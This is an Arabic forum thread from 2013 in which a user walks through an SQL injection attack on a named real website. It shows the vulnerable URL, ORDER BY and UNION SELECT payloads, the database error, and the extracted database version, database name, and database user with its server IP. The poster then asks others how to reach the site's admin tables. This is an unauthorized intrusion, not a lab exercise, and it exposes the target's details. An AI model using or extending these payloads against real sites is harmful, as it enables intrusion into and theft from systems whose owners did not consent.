أرجـــــوووووكم مـــساعدة :-(
 

:alla::alla::alla: تعبت من نفس المشكلة...

إخواني دئماً بتصيبني وأقف عاجز أمامها...
إنه بعد ما أستعلم عن عدد الأعمدة بحاول أطالع العمود المصاب...
بس بدل ما يطلع رقم العمود المصاب يطلعلي الخطأ...
هذا مثال حي....
وثغرة جديدة 100%

http://www.dracoders.com/games.php?id=7'

طيب بعد ال order+ by
عدد الأعمدة طلع 5

أنا جربت union+select
هيك يعني:

http://www.dracoders.com/games.php?i...ct+1,2,3,4,5--

بس المشكلة انه ما طلع العمود المصاب...طلعلي خطأ السكيول

ERROR [QUERY] : Query exec error:select * from cms_games where id=-7 union select 1,2,3,4,5/* mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' at line 1 mySQL error code: 1064 Date: Wednesday 02nd 2013f January 2013 03:44:12 AM

شوفوا التاريخ...هذا اليوم...يعني الثغرة لسا جديدة وما تسكرت...

أرجـــــــــوووووووووووووووكم ساعدوني

:122::122:

رد: أرجـــــوووووكم مـــساعدة :-(
 

رد: أرجـــــوووووكم مـــساعدة :-(
 

مــــــشكووووووور يا طـــيّب....شكراً للمساعدة:clap:

رد: أرجـــــوووووكم مـــساعدة :-(
 

أخي الكريم...معلش تحملني شوي...
بعرف زودتها عليك...

على نفس الموقع,,
مشي الحال معي...بس وصلت لنقطة وبعدها ضعت...

طلعت اصدار قاعدة البيانات


5.0.92-enterprise-gpl-log

واسم القاعدة

Sql286973_5

واسم مستخدم القاعدة

Sql286973@62.149.131.163

بعدين طلعت الجداول الموجودة بالقاعدة الرئيسية...

بس ولا واحد منهم بدل على آدمن أو إدارة....إلخ



CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLAT ION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRI VILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTIC S,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES, SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE _CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRI GGERS,USER_PRIVILEGES,USER_STATISTICS,VIE


ولله ضعت وماعاد عرفت شو ساوي بعدين..أرجوك بس ترشدني وتقلي شو الخطوات بعدين..أو شو لازم ساوي مع ذكر السبب اذا في مجال مشان أعرف شو عم ساوي...
وبكرر أسفي...بس بدنا نتعلم ;-)

ومـــــــشكووووور ســـلف